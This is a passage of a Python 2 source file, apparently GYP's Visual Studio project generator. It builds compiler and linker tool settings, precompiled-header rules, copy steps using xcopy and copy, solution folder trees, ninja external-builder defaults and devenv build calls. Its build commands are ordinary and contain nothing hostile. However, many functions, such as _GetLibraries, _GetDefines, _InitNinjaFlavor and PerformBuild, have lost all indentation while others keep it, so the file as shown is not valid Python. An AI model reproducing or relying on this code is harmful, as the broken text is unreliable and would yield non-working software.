  defines = [_EscapeCppDefineForMSVS(d) for d in defines]
  disabled_warnings = _GetDisabledWarnings(config)
  prebuild = config.get('msvs_prebuild')
  postbuild = config.get('msvs_postbuild')
  def_file = _GetModuleDefinition(spec)
  precompiled_header = config.get('msvs_precompiled_header')

  # Prepare the list of tools as a dictionary.
  tools = dict()
  # Add in user specified msvs_settings.
  msvs_settings = config.get('msvs_settings', {})
  MSVSSettings.ValidateMSVSSettings(msvs_settings)

  # Prevent default library inheritance from the environment.
  # NOTE: appended BEFORE user settings so user values extend, not replace it.
  _ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', ['$(NOINHERIT)'])

  for tool in msvs_settings:
    settings = config['msvs_settings'][tool]
    for setting in settings:
      _ToolAppend(tools, tool, setting, settings[setting])
  # Add the information to the appropriate tool
  _ToolAppend(tools, 'VCCLCompilerTool',
              'AdditionalIncludeDirectories', include_dirs)
  _ToolAppend(tools, 'VCResourceCompilerTool',
              'AdditionalIncludeDirectories', resource_include_dirs)
  # Add in libraries.
  _ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', libraries)
  _ToolAppend(tools, 'VCLinkerTool', 'AdditionalLibraryDirectories',
              library_dirs)
  if out_file:
    # only_if_unset: user msvs_settings already added above take precedence.
    _ToolAppend(tools, vc_tool, 'OutputFile', out_file, only_if_unset=True)
  # Add defines.
  _ToolAppend(tools, 'VCCLCompilerTool', 'PreprocessorDefinitions', defines)
  _ToolAppend(tools, 'VCResourceCompilerTool', 'PreprocessorDefinitions',
              defines)
  # Change program database directory to prevent collisions.
  _ToolAppend(tools, 'VCCLCompilerTool', 'ProgramDataBaseFileName',
              '$(IntDir)$(ProjectName)\\vc80.pdb', only_if_unset=True)
  # Add disabled warnings.
  _ToolAppend(tools, 'VCCLCompilerTool',
              'DisableSpecificWarnings', disabled_warnings)
  # Add Pre-build.
  _ToolAppend(tools, 'VCPreBuildEventTool', 'CommandLine', prebuild)
  # Add Post-build.
  _ToolAppend(tools, 'VCPostBuildEventTool', 'CommandLine', postbuild)
  # Turn on precompiled headers if appropriate.
  if precompiled_header:
    precompiled_header = os.path.split(precompiled_header)[1]
    _ToolAppend(tools, 'VCCLCompilerTool', 'UsePrecompiledHeader', '2')
    _ToolAppend(tools, 'VCCLCompilerTool',
                'PrecompiledHeaderThrough', precompiled_header)
    _ToolAppend(tools, 'VCCLCompilerTool',
                'ForcedIncludeFiles', precompiled_header)
  # Loadable modules don't generate import libraries;
  # tell dependent projects to not expect one.
  if spec['type'] == 'loadable_module':
    _ToolAppend(tools, 'VCLinkerTool', 'IgnoreImportLibrary', 'true')
  # Set the module definition file if any.
  if def_file:
    _ToolAppend(tools, 'VCLinkerTool', 'ModuleDefinitionFile', def_file)

  _AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name)
def _GetIncludeDirs(config):
  """Returns the list of directories to be used for #include directives.

  Arguments:
    config: The dictionary that defines the special processing to be done
        for this configuration.
  Returns:
    A pair of (include directory paths, resource include directory paths).
  """
  # TODO(bradnelson): include_dirs should really be flexible enough not to
  # require this sort of thing.
  raw_includes = (config.get('include_dirs', []) +
                  config.get('msvs_system_include_dirs', []))
  # Resource includes fall back to the regular include list when not given.
  raw_resource_includes = config.get('resource_include_dirs', raw_includes)
  return _FixPaths(raw_includes), _FixPaths(raw_resource_includes)
def _GetLibraryDirs(config):
  """Returns the list of directories to be used for library search paths.

  Arguments:
    config: The dictionary that defines the special processing to be done
        for this configuration.
  Returns:
    The list of directory paths.
  """
  return _FixPaths(config.get('library_dirs', []))
def _GetLibraries(spec):
"""Returns the list of libraries for this configuration.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The list of directory paths.
"""
libraries = spec.get('libraries', [])
# Strip out -l, as it is not used on windows (but is needed so we can pass
# in libraries that are assumed to be in the default library path).
# Also remove duplicate entries, leaving only the last duplicate, while
# preserving order.
found = OrderedSet()
unique_libraries_list = []
for entry in reversed(libraries):
library = re.sub('^\-l', '', entry)
if not os.path.splitext(library)[1]:
library += '.lib'
if library not in found:
found.add(library)
unique_libraries_list.append(library)
unique_libraries_list.reverse()
return unique_libraries_list
def _GetOutputFilePathAndTool(spec, msbuild):
"""Returns the path and tool to use for this target.
Figures out the path of the file this spec will create and the name of
the VC tool that will create it.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A triple of (file path, name of the vc tool, name of the msbuild tool)
"""
# Select a name for the output file.
out_file = ''
vc_tool = ''
msbuild_tool = ''
output_file_map = {
'executable': ('VCLinkerTool', 'Link', '$(OutDir)', '.exe'),
'shared_library': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'loadable_module': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'static_library': ('VCLibrarianTool', 'Lib', '$(OutDir)lib\\', '.lib'),
}
output_file_props = output_file_map.get(spec['type'])
if output_file_props and int(spec.get('msvs_auto_output_file', 1)):
vc_tool, msbuild_tool, out_dir, suffix = output_file_props
if spec.get('standalone_static_library', 0):
out_dir = '$(OutDir)'
out_dir = spec.get('product_dir', out_dir)
product_extension = spec.get('product_extension')
if product_extension:
suffix = '.' + product_extension
elif msbuild:
suffix = '$(TargetExt)'
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
out_file = ntpath.join(out_dir, prefix + product_name + suffix)
return out_file, vc_tool, msbuild_tool
def _GetOutputTargetExt(spec):
"""Returns the extension for this target, including the dot
If product_extension is specified, set target_extension to this to avoid
MSB8012, returns None otherwise. Ignores any target_extension settings in
the input files.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A string with the extension, or None
"""
target_extension = spec.get('product_extension')
if target_extension:
return '.' + target_extension
return None
def _GetDefines(config):
"""Returns the list of preprocessor definitions for this configuation.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of preprocessor definitions.
"""
defines = []
for d in config.get('defines', []):
if type(d) == list:
fd = '='.join([str(dpart) for dpart in d])
else:
fd = str(d)
defines.append(fd)
return defines
def _GetDisabledWarnings(config):
return [str(i) for i in config.get('msvs_disabled_warnings', [])]
def _GetModuleDefinition(spec):
def_file = ''
if spec['type'] in ['shared_library', 'loadable_module', 'executable']:
def_files = [s for s in spec.get('sources', []) if s.endswith('.def')]
if len(def_files) == 1:
def_file = _FixPath(def_files[0])
elif def_files:
raise ValueError(
'Multiple module definition files in one target, target %s lists '
'multiple .def files: %s' % (
spec['target_name'], ' '.join(def_files)))
return def_file
def _ConvertToolsToExpectedForm(tools):
  """Convert tools to a form expected by Visual Studio.

  Arguments:
    tools: A dictionary of settings; the tool name is the key.
  Returns:
    A list of Tool objects.
  """
  tool_list = []
  for tool, settings in tools.iteritems():
    # Collapse list-valued settings into a single delimited string.
    settings_fixed = {}
    for setting, value in settings.iteritems():
      if type(value) == list:
        # Linker AdditionalDependencies and any AdditionalOptions are
        # space-delimited; everything else uses semicolons.
        space_delimited = (
            (tool == 'VCLinkerTool' and
             setting == 'AdditionalDependencies') or
            setting == 'AdditionalOptions')
        delimiter = ' ' if space_delimited else ';'
        settings_fixed[setting] = delimiter.join(value)
      else:
        settings_fixed[setting] = value
    # Add in this tool.
    tool_list.append(MSVSProject.Tool(tool, settings_fixed))
  return tool_list
def _AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name):
  """Add to the project file the configuration specified by config.

  Arguments:
    p: The target project being generated.
    spec: the target project dict.
    tools: A dictionary of settings; the tool name is the key.
    config: The dictionary that defines the special processing to be done
        for this configuration.
    config_type: The configuration type, a number as defined by Microsoft.
    config_name: The name of the configuration.
  """
  attrs = _GetMSVSAttributes(spec, config, config_type)
  tool_list = _ConvertToolsToExpectedForm(tools)
  full_name = _ConfigFullName(config_name, config)
  # Add in this configuration.
  p.AddConfig(full_name, attrs=attrs, tools=tool_list)
def _GetMSVSAttributes(spec, config, config_type):
  """Builds the attribute dict for one MSVS project configuration."""
  # Start from the user-specified configuration attributes.
  prepared_attrs = {}
  source_attrs = config.get('msvs_configuration_attributes', {})
  for a in source_attrs:
    prepared_attrs[a] = source_attrs[a]
  # Add props files.
  vsprops_dirs = _FixPaths(config.get('msvs_props', []))
  if vsprops_dirs:
    prepared_attrs['InheritedPropertySheets'] = ';'.join(vsprops_dirs)
  # Set configuration type.
  prepared_attrs['ConfigurationType'] = config_type
  output_dir = prepared_attrs.get('OutputDirectory',
                                  '$(SolutionDir)$(ConfigurationName)')
  prepared_attrs['OutputDirectory'] = _FixPath(output_dir) + '\\'
  if 'IntermediateDirectory' in prepared_attrs:
    intermediate = _FixPath(prepared_attrs['IntermediateDirectory']) + '\\'
    intermediate = MSVSSettings.FixVCMacroSlashes(intermediate)
  else:
    # Default intermediate directory, scoped by configuration and project.
    intermediate = _FixPath('$(ConfigurationName)\\obj\\$(ProjectName)') + '\\'
  prepared_attrs['IntermediateDirectory'] = intermediate
  return prepared_attrs
def _AddNormalizedSources(sources_set, sources_array):
  # Normalize each path before adding so duplicates collapse in the set.
  for source in sources_array:
    sources_set.add(_NormalizedSource(source))
def _PrepareListOfSources(spec, generator_flags, gyp_file):
  """Prepare list of sources and excluded sources.

  Besides the sources specified directly in the spec, adds the gyp file so
  that a change to it will cause a re-compile. Also adds appropriate sources
  for actions and copies. Assumes later stage will un-exclude files which
  have custom build steps attached.

  Arguments:
    spec: The target dictionary containing the properties of the target.
    generator_flags: Generator-specific flags; 'standalone' suppresses
        adding the gyp file itself to the sources.
    gyp_file: The name of the gyp file.
  Returns:
    A pair of (list of sources, list of excluded sources).
    The sources will be relative to the gyp file.
  """
  sources = OrderedSet()
  _AddNormalizedSources(sources, spec.get('sources', []))
  excluded_sources = OrderedSet()
  # Add in the gyp file.
  if not generator_flags.get('standalone'):
    sources.add(gyp_file)
  # Add in 'action' inputs and outputs.
  for a in spec.get('actions', []):
    inputs = a['inputs']
    inputs = [_NormalizedSource(i) for i in inputs]
    # Add all inputs to sources and excluded sources.
    inputs = OrderedSet(inputs)
    sources.update(inputs)
    # With an external builder (e.g. ninja) action inputs stay in the
    # regular build; otherwise they are excluded here and re-attached to
    # their custom build steps by a later stage (see docstring).
    if not spec.get('msvs_external_builder'):
      excluded_sources.update(inputs)
    if int(a.get('process_outputs_as_sources', False)):
      _AddNormalizedSources(sources, a.get('outputs', []))
  # Add in 'copies' inputs and outputs.
  for cpy in spec.get('copies', []):
    _AddNormalizedSources(sources, cpy.get('files', []))
  return (sources, excluded_sources)
def _AdjustSourcesAndConvertToFilterHierarchy(
    spec, options, gyp_dir, sources, excluded_sources, list_excluded, version):
  """Adjusts the list of sources and excluded sources.

  Also converts the sets to lists.

  Arguments:
    spec: The target dictionary containing the properties of the target.
    options: Global generator options.
    gyp_dir: The path to the gyp file being processed.
    sources: A set of sources to be included for this project.
    excluded_sources: A set of sources to be excluded for this project.
    list_excluded: Passed through to _ConvertSourcesToFilterHierarchy;
        controls handling of the fully-excluded files.
    version: A MSVSVersion object.
  Returns:
    A trio of (list of sources, list of excluded sources,
               path of excluded IDL file)
  """
  # Exclude excluded sources coming into the generator.
  excluded_sources.update(OrderedSet(spec.get('sources_excluded', [])))
  # Add excluded sources into sources for good measure.
  sources.update(excluded_sources)
  # Convert to proper windows form.
  # NOTE: sources goes from being a set to a list here.
  # NOTE: excluded_sources goes from being a set to a list here.
  sources = _FixPaths(sources)
  # Convert to proper windows form.
  excluded_sources = _FixPaths(excluded_sources)
  excluded_idl = _IdlFilesHandledNonNatively(spec, sources)
  precompiled_related = _GetPrecompileRelatedFiles(spec)
  # Find the excluded ones, minus the precompiled header related ones.
  fully_excluded = [i for i in excluded_sources if i not in precompiled_related]
  # Convert to folders and the right slashes.
  sources = [i.split('\\') for i in sources]
  sources = _ConvertSourcesToFilterHierarchy(sources, excluded=fully_excluded,
                                             list_excluded=list_excluded,
                                             msvs_version=version)
  # Prune filters with a single child to flatten ugly directory structures
  # such as ../../src/modules/module1 etc.
  while len(sources) == 1 and isinstance(sources[0], MSVSProject.Filter):
    sources = sources[0].contents
  return sources, excluded_sources, excluded_idl
def _IdlFilesHandledNonNatively(spec, sources):
# If any non-native rules use 'idl' as an extension exclude idl files.
# Gather a list here to use later.
using_idl = False
for rule in spec.get('rules', []):
if rule['extension'] == 'idl' and int(rule.get('msvs_external_rule', 0)):
using_idl = True
break
if using_idl:
excluded_idl = [i for i in sources if i.endswith('.idl')]
else:
excluded_idl = []
return excluded_idl
def _GetPrecompileRelatedFiles(spec):
  """Returns fixed-up paths of precompiled-header related sources."""
  precompiled_related = []
  for _, config in spec['configurations'].iteritems():
    for key in precomp_keys:
      source = config.get(key)
      if source:
        precompiled_related.append(_FixPath(source))
  return precompiled_related
def _ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
                                list_excluded):
  """Marks excluded files as ExcludedFromBuild in each affected config."""
  exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
  num_configs = len(spec['configurations'])
  for file_name, excluded_configs in exclusions.iteritems():
    if not list_excluded and len(excluded_configs) == num_configs:
      # If we're not listing excluded files, then they won't appear in the
      # project, so don't try to configure them to be excluded.
      continue
    for config_name, config in excluded_configs:
      p.AddFileConfig(file_name, _ConfigFullName(config_name, config),
                      {'ExcludedFromBuild': 'true'})
def _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl):
  """Maps each excluded file to the (name, config) pairs it is excluded in."""
  exclusions = {}
  configurations = spec['configurations']
  # Exclude excluded sources from being built.
  for f in excluded_sources:
    excluded_configs = []
    for config_name, config in configurations.iteritems():
      precomped = [_FixPath(config.get(i, '')) for i in precomp_keys]
      # Don't do this for ones that are precompiled header related.
      if f not in precomped:
        excluded_configs.append((config_name, config))
    exclusions[f] = excluded_configs
  # If any non-native rules use 'idl' as an extension exclude idl files.
  # Exclude them now, in every configuration.
  for f in excluded_idl:
    exclusions[f] = [(config_name, config)
                     for config_name, config in configurations.iteritems()]
  return exclusions
def _AddToolFilesToMSVS(p, spec):
  # Add in tool files (rules), deduplicated across configurations.
  tool_files = OrderedSet()
  for _, config in spec['configurations'].iteritems():
    tool_files.update(config.get('msvs_tool_files', []))
  for tool_file in tool_files:
    p.AddToolFile(tool_file)
def _HandlePreCompiledHeaders(p, sources, spec):
  """Configures precompiled-header flags on the relevant source files.

  Arguments:
    p: The target project being generated.
    sources: The hierarchy of filters/sources of the project.
    spec: The target dictionary containing the properties of the target.
  """
  # Pre-compiled header source stubs need a different compiler flag
  # (generate precompiled header) and any source file not of the same
  # kind (i.e. C vs. C++) as the precompiled header source stub needs
  # to have use of precompiled headers disabled.
  extensions_excluded_from_precompile = []
  for config_name, config in spec['configurations'].iteritems():
    source = config.get('msvs_precompiled_source')
    if source:
      source = _FixPath(source)
      # UsePrecompiledHeader=1 for if using precompiled headers.
      tool = MSVSProject.Tool('VCCLCompilerTool',
                              {'UsePrecompiledHeader': '1'})
      p.AddFileConfig(source, _ConfigFullName(config_name, config),
                      {}, tools=[tool])
      # A .c stub means C++ sources must not use the PCH, and vice versa.
      # NOTE(review): if configs disagree on the stub kind, only the last
      # iterated config wins here — confirm that is intended.
      basename, extension = os.path.splitext(source)
      if extension == '.c':
        extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
      else:
        extensions_excluded_from_precompile = ['.c']
  # Walk the filter hierarchy and disable PCH use (in every configuration)
  # for sources whose extension conflicts with the precompiled stub.
  def DisableForSourceTree(source_tree):
    for source in source_tree:
      if isinstance(source, MSVSProject.Filter):
        DisableForSourceTree(source.contents)
      else:
        basename, extension = os.path.splitext(source)
        if extension in extensions_excluded_from_precompile:
          for config_name, config in spec['configurations'].iteritems():
            tool = MSVSProject.Tool('VCCLCompilerTool',
                                    {'UsePrecompiledHeader': '0',
                                     'ForcedIncludeFiles': '$(NOINHERIT)'})
            p.AddFileConfig(_FixPath(source),
                            _ConfigFullName(config_name, config),
                            {}, tools=[tool])
  # Do nothing if there was no precompiled source.
  if extensions_excluded_from_precompile:
    DisableForSourceTree(sources)
def _AddActions(actions_to_add, spec, relative_path_of_gyp_file):
  """Registers each 'action' in the spec as a custom build step."""
  # Don't setup_env every time. When all the actions are run together in one
  # batch file in VS, the PATH will grow too long.
  # Membership in this set means that the cygwin environment has been set up,
  # and does not need to be set up again.
  have_setup_env = set()
  for action in spec.get('actions', []):
    # Attach actions to the gyp file if nothing else is there.
    inputs = action.get('inputs') or [relative_path_of_gyp_file]
    attached_to = inputs[0]
    need_setup_env = attached_to not in have_setup_env
    cmd = _BuildCommandLineForRule(spec, action, has_input_path=False,
                                   do_setup_env=need_setup_env)
    have_setup_env.add(attached_to)
    # Add the action.
    _AddActionStep(actions_to_add,
                   inputs=inputs,
                   outputs=action.get('outputs', []),
                   description=action.get('message', action['action_name']),
                   command=cmd)
def _WriteMSVSUserFile(project_path, version, spec):
  """Writes the .user file carrying per-configuration debug settings."""
  # Add run_as and test targets.
  if 'run_as' in spec:
    run_as = spec['run_as']
    settings = (run_as.get('action', []),
                run_as.get('environment', []),
                run_as.get('working_directory', '.'))
  elif int(spec.get('test', 0)):
    # Tests default to launching the built binary with gtest timing output.
    settings = (['$(TargetPath)', '--gtest_print_time'], [], '.')
  else:
    return  # Nothing to add
  action, environment, working_directory = settings
  # Write out the user file.
  user_file = _CreateMSVSUserFile(project_path, version, spec)
  for config_name, c_data in spec['configurations'].iteritems():
    user_file.AddDebugSettings(_ConfigFullName(config_name, c_data),
                               action, environment, working_directory)
  user_file.WriteIfChanged()
def _AddCopies(actions_to_add, spec):
  """Registers each copy step in the spec as a custom build action."""
  for inputs, outputs, cmd, description in _GetCopies(spec):
    _AddActionStep(actions_to_add, inputs=inputs, outputs=outputs,
                   description=description, command=cmd)
def _GetCopies(spec):
  """Builds (inputs, outputs, command, description) tuples for 'copies'.

  Sources ending in '/' are copied as whole directories via xcopy; plain
  files via mkdir+copy.
  """
  copies = []
  # Add copies.
  for cpy in spec.get('copies', []):
    for src in cpy.get('files', []):
      dst = os.path.join(cpy['destination'], os.path.basename(src))
      # _AddCustomBuildToolForMSVS() will call _FixPath() on the inputs and
      # outputs, so do the same for our generated command line.
      if src.endswith('/'):
        # Directory copy: strip the trailing slash and xcopy the tree.
        src_bare = src[:-1]
        base_dir = posixpath.split(src_bare)[0]
        outer_dir = posixpath.split(src_bare)[1]
        cmd = 'cd "%s" && xcopy /e /f /y "%s" "%s\\%s\\"' % (
            _FixPath(base_dir), outer_dir, _FixPath(dst), outer_dir)
        # NOTE(review): 'dummy_copies' in the outputs appears intended to
        # keep the step from being considered up to date — confirm.
        copies.append(([src], ['dummy_copies', dst], cmd,
                       'Copying %s to %s' % (src, dst)))
      else:
        # Single file: 'set ERRORLEVEL=0' clears the status of a failed
        # mkdir (presumably when the destination already exists — confirm).
        cmd = 'mkdir "%s" 2>nul & set ERRORLEVEL=0 & copy /Y "%s" "%s"' % (
            _FixPath(cpy['destination']), _FixPath(src), _FixPath(dst))
        copies.append(([src], [dst], cmd, 'Copying %s to %s' % (src, dst)))
  return copies
def _GetPathDict(root, path):
# |path| will eventually be empty (in the recursive calls) if it was initially
# relative; otherwise it will eventually end up as '\', 'D:\', etc.
if not path or path.endswith(os.sep):
return root
parent, folder = os.path.split(path)
parent_dict = _GetPathDict(root, parent)
if folder not in parent_dict:
parent_dict[folder] = dict()
return parent_dict[folder]
def _DictsToFolders(base_path, bucket, flat):
  """Recursively converts the path-keyed dict tree into solution entries."""
  children = []
  for folder, contents in bucket.iteritems():
    if type(contents) == dict:
      subtree = _DictsToFolders(os.path.join(base_path, folder),
                                contents, flat)
      if flat:
        # Flat solutions hoist every entry to the top level.
        children.extend(subtree)
      else:
        children.append(
            MSVSNew.MSVSFolder(os.path.join(base_path, folder),
                               name='(' + folder + ')',
                               entries=subtree))
    else:
      # Leaf: an actual project object.
      children.append(contents)
  return children
def _CollapseSingles(parent, node):
# Recursively explorer the tree of dicts looking for projects which are
# the sole item in a folder which has the same name as the project. Bring
# such projects up one level.
if (type(node) == dict and
len(node) == 1 and
node.keys()[0] == parent + '.vcproj'):
return node[node.keys()[0]]
if type(node) != dict:
return node
for child in node:
node[child] = _CollapseSingles(child, node[child])
return node
def _GatherSolutionFolders(sln_projects, project_objects, flat):
  """Arranges the solution's projects into a folder hierarchy."""
  root = {}
  # Convert into a tree of dicts on path.
  for p in sln_projects:
    gyp_file, target = gyp.common.ParseQualifiedTarget(p)[0:2]
    gyp_dir = os.path.dirname(gyp_file)
    path_dict = _GetPathDict(root, gyp_dir)
    path_dict[target + '.vcproj'] = project_objects[p]
  # Walk down from the top until we hit a folder that has more than one
  # entry. In practice, this strips the top-level "src/" dir from the
  # hierarchy in the solution.
  while len(root) == 1:
    only_child = root[list(root)[0]]
    if type(only_child) != dict:
      break
    root = only_child
  # Collapse singles.
  root = _CollapseSingles('', root)
  # Merge buckets until everything is a root entry.
  return _DictsToFolders('', root, flat)
def _GetPathOfProject(qualified_target, spec, options, msvs_version):
  """Returns (project path, prefix for fixing up relative source paths)."""
  # Pick the project filename: an existing vcproj wins over a generated name.
  default_config = _GetDefaultConfiguration(spec)
  project_filename = default_config.get('msvs_existing_vcproj')
  if not project_filename:
    project_filename = ''.join([spec['target_name'], options.suffix,
                                msvs_version.ProjectExtension()])
  build_file = gyp.common.BuildFile(qualified_target)
  project_path = os.path.join(os.path.dirname(build_file), project_filename)
  prefix = None
  if options.generator_output:
    # When redirecting output, remember how to get back to the original
    # project directory so relative source paths can be fixed up.
    original_dir = os.path.dirname(os.path.abspath(project_path))
    project_path = os.path.join(options.generator_output, project_path)
    prefix = gyp.common.RelativePath(original_dir,
                                     os.path.dirname(project_path))
  return project_path, prefix
def _GetPlatformOverridesOfProject(spec):
  # Prepare a dict indicating which project configurations are used for which
  # solution configurations for this target.
  overrides = {}
  for config_name, config in spec['configurations'].iteritems():
    full_name = _ConfigFullName(config_name, config)
    default_platform = _ConfigPlatform(config)
    platform = config.get('msvs_target_platform', default_platform)
    base_name = _ConfigBaseName(config_name, default_platform)
    overrides[full_name] = '%s|%s' % (base_name, platform)
  return overrides
def _CreateProjectObjects(target_list, target_dicts, options, msvs_version):
  """Create a MSVSProject object for the targets found in target list.

  Arguments:
    target_list: the list of targets to generate project objects for.
    target_dicts: the dictionary of specifications.
    options: global generator options.
    msvs_version: the MSVSVersion object.
  Returns:
    A set of created projects, keyed by target.
  """
  # fixpath_prefix is module-level state updated per project.
  global fixpath_prefix
  # Generate each project.
  projects = {}
  for qualified_target in target_list:
    spec = target_dicts[qualified_target]
    # Only the 'target' toolset is supported by this generator.
    if spec['toolset'] != 'target':
      raise GypError(
          'Multiple toolsets not supported in msvs build (target %s)' %
          qualified_target)
    proj_path, fixpath_prefix = _GetPathOfProject(qualified_target, spec,
                                                  options, msvs_version)
    guid = _GetGuidOfProject(proj_path, spec)
    overrides = _GetPlatformOverridesOfProject(spec)
    build_file = gyp.common.BuildFile(qualified_target)
    # Create object for this project.
    obj = MSVSNew.MSVSProject(
        proj_path,
        name=spec['target_name'],
        guid=guid,
        spec=spec,
        build_file=build_file,
        config_platform_overrides=overrides,
        fixpath_prefix=fixpath_prefix)
    # Set project toolset if any (MS build only)
    if msvs_version.UsesVcxproj():
      obj.set_msbuild_toolset(
          _GetMsbuildToolsetOfProject(proj_path, spec, msvs_version))
    projects[qualified_target] = obj
  # Set all the dependencies, but not if we are using an external builder like
  # ninja
  for project in projects.values():
    if not project.spec.get('msvs_external_builder'):
      deps = project.spec.get('dependencies', [])
      deps = [projects[d] for d in deps]
      project.set_dependencies(deps)
  return projects
def _InitNinjaFlavor(options, target_list, target_dicts):
"""Initialize targets for the ninja flavor.
This sets up the necessary variables in the targets to generate msvs projects
that use ninja as an external builder. The variables in the spec are only set
if they have not been set. This allows individual specs to override the
default values initialized here.
Arguments:
options: Options provided to the generator.
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
"""
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec.get('msvs_external_builder'):
# The spec explicitly defined an external builder, so don't change it.
continue
path_to_ninja = spec.get('msvs_path_to_ninja', 'ninja.exe')
spec['msvs_external_builder'] = 'ninja'
if not spec.get('msvs_external_builder_out_dir'):
spec['msvs_external_builder_out_dir'] = \
options.depth + '/out/$(Configuration)'
if not spec.get('msvs_external_builder_build_cmd'):
spec['msvs_external_builder_build_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'$(ProjectName)',
]
if not spec.get('msvs_external_builder_clean_cmd'):
spec['msvs_external_builder_clean_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'-t',
'clean',
'$(ProjectName)',
]
def CalculateVariables(default_variables, params):
  """Generated variables that require params to be known."""
  generator_flags = params.get('generator_flags', {})
  # Select project file format version (if unset, default to auto detecting).
  msvs_version = MSVSVersion.SelectVisualStudioVersion(
      generator_flags.get('msvs_version', 'auto'))
  # Stash msvs_version for later (so we don't have to probe the system twice).
  params['msvs_version'] = msvs_version
  # Set a variable so conditions can be based on msvs_version.
  default_variables['MSVS_VERSION'] = msvs_version.ShortName()
  # To determine processor word size on Windows, in addition to checking
  # PROCESSOR_ARCHITECTURE (which reflects the word size of the current
  # process), it is also necessary to check PROCESSOR_ARCITEW6432 (which
  # contains the actual word size of the system when running thru WOW64).
  arch = os.environ.get('PROCESSOR_ARCHITECTURE', '')
  arch_wow64 = os.environ.get('PROCESSOR_ARCHITEW6432', '')
  if '64' in arch or '64' in arch_wow64:
    default_variables['MSVS_OS_BITS'] = 64
  else:
    default_variables['MSVS_OS_BITS'] = 32
  if gyp.common.GetFlavor(params) == 'ninja':
    default_variables['SHARED_INTERMEDIATE_DIR'] = '$(OutDir)gen'
def PerformBuild(data, configurations, params):
options = params['options']
msvs_version = params['msvs_version']
devenv = os.path.join(msvs_version.path, 'Common7', 'IDE', 'devenv.com')
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
sln_path = build_file_root + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
for config in configurations:
arguments = [devenv, sln_path, '/Build', config]
print 'Building [%s]: %s' % (config, arguments)
rtn = subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
  """Generate .sln and .vcproj files.

  This is the entry point for this generator.

  Arguments:
    target_list: List of target pairs: 'base/base.gyp:base'.
    target_dicts: Dict of target properties keyed on target pair.
    data: Dictionary containing per .gyp data.
    params: Generator-wide options and stashed state ('msvs_version').
  """
  global fixpath_prefix
  options = params['options']
  # Get the project file format version back out of where we stashed it in
  # GeneratorCalculatedVariables.
  msvs_version = params['msvs_version']
  generator_flags = params.get('generator_flags', {})
  # Optionally shard targets marked with 'msvs_shard': SHARD_COUNT.
  (target_list, target_dicts) = MSVSUtil.ShardTargets(target_list, target_dicts)
  # Optionally use the large PDB workaround for targets marked with
  # 'msvs_large_pdb': 1.
  (target_list, target_dicts) = MSVSUtil.InsertLargePdbShims(
      target_list, target_dicts, generator_default_variables)
  # Optionally configure each spec to use ninja as the external builder.
  if params.get('flavor') == 'ninja':
    _InitNinjaFlavor(options, target_list, target_dicts)
  # Prepare the set of configurations.
  configs = set()
  for qualified_target in target_list:
    spec = target_dicts[qualified_target]
    for config_name, config in spec['configurations'].iteritems():
      configs.add(_ConfigFullName(config_name, config))
  configs = list(configs)
  # Figure out all the projects that will be generated and their guids
  project_objects = _CreateProjectObjects(target_list, target_dicts, options,
                                          msvs_version)
  # Generate each project.
  missing_sources = []
  for project in project_objects.values():
    # Point the module-level fixpath_prefix at this project while it is
    # being generated, then clear it afterwards.
    fixpath_prefix = project.fixpath_prefix
    missing_sources.extend(_GenerateProject(project, options, msvs_version,
                                            generator_flags))
  fixpath_prefix = None
  # One solution per input .gyp file.
  for build_file in data:
    # Validate build_file extension
    if not build_file.endswith('.gyp'):
      continue
    sln_path = os.path.splitext(build_file)[0] + options.suffix + '.sln'
    if options.generator_output:
      sln_path = os.path.join(options.generator_output, sln_path)
    # Get projects in the solution, and their dependents.
    sln_projects = gyp.common.BuildFileTargets(target_list, build_file)
    sln_projects += gyp.common.DeepDependencyTargets(target_dicts, sln_projects)
    # Create folder hierarchy.
    root_entries = _GatherSolutionFolders(
        sln_projects, project_objects, flat=msvs_version.FlatSolution())
    # Create solution.
    sln = MSVSNew.MSVSSolution(sln_path,
                               entries=root_entries,
                               variants=configs,
                               websiteProperties=False,
                               version=msvs_version)
    sln.Write()
  # Report (or fail on) any inputs that were referenced but never found.
  if missing_sources:
    error_message = "Missing input files:\n" + \
                    '\n'.join(set(missing_sources))
    if generator_flags.get('msvs_error_on_missing_sources', False):
      raise GypError(error_message)
    else:
      print >> sys.stdout, "Warning: " + error_message
def _GenerateMSBuildFiltersFile(filters_path, source_files,
                                extension_to_rule_name):
  """Generate the filters file.

  This file is used by Visual Studio to organize the presentation of source
  files into folders.

  Arguments:
    filters_path: The path of the file to be created.
    source_files: The hierarchical structure of all the sources.
    extension_to_rule_name: A dictionary mapping file extensions to rules.
  """
  filter_group = []
  source_group = []
  _AppendFiltersForMSBuild('', source_files, extension_to_rule_name,
                           filter_group, source_group)
  if not filter_group:
    # We don't need this filter anymore. Delete the old filter file.
    if os.path.exists(filters_path):
      os.unlink(filters_path)
    return
  content = ['Project',
             {'ToolsVersion': '4.0',
              'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
             },
             ['ItemGroup'] + filter_group,
             ['ItemGroup'] + source_group
            ]
  easy_xml.WriteXmlIfChanged(content, filters_path, pretty=True, win32=True)
def _AppendFiltersForMSBuild(parent_filter_name, sources,
                             extension_to_rule_name,
                             filter_group, source_group):
  """Creates the list of filters and sources to be added in the filter file.

  Args:
